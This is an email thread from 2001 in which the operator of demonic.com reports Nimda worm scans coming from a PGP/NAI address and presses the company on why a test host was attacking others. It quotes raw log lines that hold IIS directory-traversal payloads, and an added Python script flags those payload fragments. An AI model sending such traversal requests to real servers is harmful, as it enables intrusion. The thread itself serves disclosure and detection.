The following is an e-mail thread between me and PGP after receiving Nimda signature attacks against demonic.com. The last mail I sent was never responded to.


From: jericho@demonic.com
To: hostmaster@NAI.COM, postmaster@pgp.com, pr@NAI.COM, security@NAI.COM,
    security@pgp.com
Date: Sat, 27 Oct 2001 23:21:29 -0600 (MDT)
Subject: security incident at pgp.com or malicious activity 


We received the following hits to demonic.com today. These are typically
the signature of the Nimda worm I believe (reference:
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209).

So I'm curious given the nature of your site..

Is a TIS/PGP host infected with Nimda?

If so, was this oversight on your staff's part? Or did a worm get loose on
your network during testing?

I'm wracking my brain here trying to come up with a valid reason that
a TIS owned IP would be scanning us like this..

Trusted Information Systems (NET-TIS-NET-155) TIS-NET-155
                         204.254.155.0 - 204.254.155.255


204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:56 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
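As an added example (not part of the thread), a small Python script that picks the worm's probe signatures out of web-server log lines in the format shown above and summarizes them per source address. The marker strings are the request-path fragments visible in the log; the sample log, including the 10.0.0.5 entry, is constructed.

```python
import re
from collections import defaultdict

# Constructed sample: three probe lines in the format of the thread plus one benign request.
SAMPLE_LOG = """\
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
10.0.0.5 - - [27/Oct/2001:21:03:12 -0600] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

# Apache-style access log: ip ident user [timestamp] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Path fragments characteristic of the worm's IIS probes, taken from the log lines above.
NIMDA_MARKERS = (
    "/root.exe", "/cmd.exe", "%c1%1c", "%c0%af", "%c0%2f", "%c1%9c",
    "%255c", "%%35c", "%%35%63", "%25%35%63",
)

def parse_line(line):
    """Return a dict of fields for a parsable log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_nimda_probe(path):
    """Case-insensitive match of the request path against the known probe fragments."""
    p = path.lower()
    return any(marker in p for marker in NIMDA_MARKERS)

def summarize_probes(log_text):
    """Group probe hits by source IP: count, first/last timestamp, and the paths seen."""
    report = defaultdict(lambda: {"count": 0, "first": None, "last": None, "paths": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_nimda_probe(rec["path"]):
            continue
        entry = report[rec["ip"]]
        entry["count"] += 1
        entry["first"] = entry["first"] or rec["ts"]
        entry["last"] = rec["ts"]
        entry["paths"].append(rec["path"])
    return dict(report)

if __name__ == "__main__":
    for ip, info in summarize_probes(SAMPLE_LOG).items():
        print(f"{ip}: {info['count']} probes between {info['first']} and {info['last']}")
```

A burst of these paths from one address within a few seconds, as in the thread, is the pattern worth alerting on; the script reports that burst rather than the individual 404s.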




From: IT Security (IT_Security@NAI.com)
To: "'jericho@demonic.com'" (jericho@demonic.com)
Date: Tue, 30 Oct 2001 16:30:55 -0600
Subject: RE: security incident at pgp.com or malicious activity 

Thank you for bringing this to our attention.

This network is part of a development and test network in one of our
Engineering facilities. The host has now been removed from public access.


Thanks again.

IT Security.

From: jericho@demonic.com
To: IT Security (IT_Security@NAI.com)
Date: Tue, 30 Oct 2001 21:07:37 -0700 (MST)
Subject: RE: security incident at pgp.com or malicious activity 


: Thank you for bringing this to our attention.
: 
: This network is part of a development and test network in one of our
: Engineering facilities.  The host has now been removed from public
: access.

Would you care to comment why a test machine (presumably for internal
testing) was network connected and left unchecked so as to allow it to
attack other machines?


